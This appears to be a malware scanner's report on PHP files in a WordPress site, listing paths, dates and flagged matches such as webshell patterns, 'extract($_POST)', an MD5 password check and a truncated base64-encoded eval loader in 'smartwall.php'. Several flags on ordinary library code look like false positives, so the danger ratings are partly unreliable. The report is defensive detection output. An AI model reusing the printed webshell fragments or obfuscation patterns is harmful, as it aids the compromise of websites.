$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/novosib/data/www/intim-novosibirska.info/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 17:08:57 Modified: 2020-09-27 17:22:04 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/novosib/data/www/intim-novosibirska.info/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 17:08:57 Modified: 2020-09-27 17:22:04 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/novosib/data/www/intim-novosibirska.info/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 17:08:57 Modified: 2020-09-27 17:22:03 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|